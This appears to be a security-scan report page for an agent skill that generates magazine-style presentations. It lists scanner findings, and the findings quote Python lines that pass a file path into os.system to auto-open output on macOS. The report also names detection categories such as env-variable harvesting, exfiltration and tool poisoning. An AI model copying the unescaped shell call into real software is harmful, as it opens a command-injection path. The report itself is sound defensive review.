ClawHub

canvasflow-专业杂志级PPT一键生成专家

Security checks across malware telemetry and agentic risk

Overview

This presentation generator mostly matches its purpose, but its helper scripts automatically run macOS shell commands to open generated files, which creates a local execution risk.

Review before installing if you plan to run the bundled scripts, especially on macOS. Prefer removing the auto-open lines or changing them to a non-shell subprocess call behind an explicit --open option, and use trusted output paths. For sensitive presentations, consider pinning or removing third-party CDN assets before sharing or opening the generated HTML.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Behavioral ASTexec() Call, eval() Call, Dynamic Import
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
Findings (13)

os.system() or os exec-family call

High
Category
Dangerous Code Execution
Content
# 自动打开(macOS)
    if sys.platform == "darwin":
        os.system(f'open "{output_file}"')


if __name__ == "__main__":
Confidence
91% confidence
Finding
os.system(f'open "{output_file}"')

os.system() or os exec-family call

High
Category
Dangerous Code Execution
Content
# 自动打开(macOS)
    if sys.platform == "darwin":
        if results["html"]:
            os.system(f'open "{results["html"]}"')
        elif results["pptx"]:
            os.system(f'open "{results["pptx"]}"')
Confidence
90% confidence
Finding
os.system(f'open "{results["html"]}"')

os.system() or os exec-family call

High
Category
Dangerous Code Execution
Content
if results["html"]:
            os.system(f'open "{results["html"]}"')
        elif results["pptx"]:
            os.system(f'open "{results["pptx"]}"')


if __name__ == "__main__":
Confidence
90% confidence
Finding
os.system(f'open "{results["pptx"]}"')

os.system() or os exec-family call

High
Category
Dangerous Code Execution
Content
# 自动打开(macOS)
    if sys.platform == "darwin":
        os.system(f'open "{output_file}"')


if __name__ == "__main__":
Confidence
96% confidence
Finding
os.system(f'open "{output_file}"')

Lp3

Medium
Category
MCP Least Privilege
Confidence
85% confidence
Finding
The skill instructs the agent to read local files, write generated content to disk, and execute a shell command (`open ...`) without declaring those capabilities as permissions. Undeclared powerful operations reduce transparency and can lead to unexpected file-system access or command execution in environments that rely on permission manifests for containment.

Tp4

High
Category
MCP Tool Poisoning
Confidence
82% confidence
Finding
The documentation overstates or misstates behavior, including hidden side effects such as writing files and invoking a shell command, while claiming capabilities that are not actually implemented. This mismatch can cause users or hosting platforms to grant trust under false assumptions, making risky operations more likely to occur without informed consent.

Context-Inappropriate Capability

Medium
Confidence
84% confidence
Finding
Automatically launching the generated HTML is outside the core requirement of generating a presentation file and introduces an unnecessary execution capability. In a skill that writes user-influenced HTML, auto-opening the output can immediately trigger active content in the browser, making any embedded script or malicious markup more dangerous.

Context-Inappropriate Capability

Medium
Confidence
92% confidence
Finding
The script automatically opens generated files on macOS without user confirmation, which exceeds the core generation function and can launch local applications unexpectedly. In a skill context, this is more dangerous because users expect content generation, not autonomous execution side effects that may open active content or external handlers.

Context-Inappropriate Capability

Low
Confidence
87% confidence
Finding
The script automatically opens the generated file using a platform command even though file generation does not require code execution or launching external applications. This expands the script's side effects and can unexpectedly invoke local handlers, increasing user risk and making abuse of the unsafe shell invocation more consequential.

Vague Triggers

Medium
Confidence
92% confidence
Finding
The trigger phrases include very generic requests such as “做 PPT” and “生成演示”, which are common in normal user conversations and can cause the skill to activate when the user did not explicitly intend to use this specific skill. In an agent environment, overly broad activation increases the chance of incorrect routing, unintended file generation, or the skill taking over unrelated presentation tasks without clear user consent.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The skill executes a shell command to open the generated HTML automatically, without confirmation. This removes user control and can cause unintended execution of browser-side scripts or external resource loads as soon as the file is created, which is riskier in this context because multiple slide fields are inserted into HTML without escaping.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
Automatic shell-based execution without prior warning violates the principle of least surprise and creates an avoidable execution pathway. Even if intended for convenience, using shell execution to launch generated artifacts can be abused or can expose users to unintended application behavior, especially when file content may be partially derived from user-controlled input.

Missing User Warnings

Medium
Confidence
83% confidence
Finding
Automatically executing a shell command without prior confirmation is unsafe because it performs an external action the user did not explicitly approve. In this skill's context, the risk is amplified by the fact that the opened target path is user-influenced and the action is unrelated to the core requirement of generating a presentation file.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal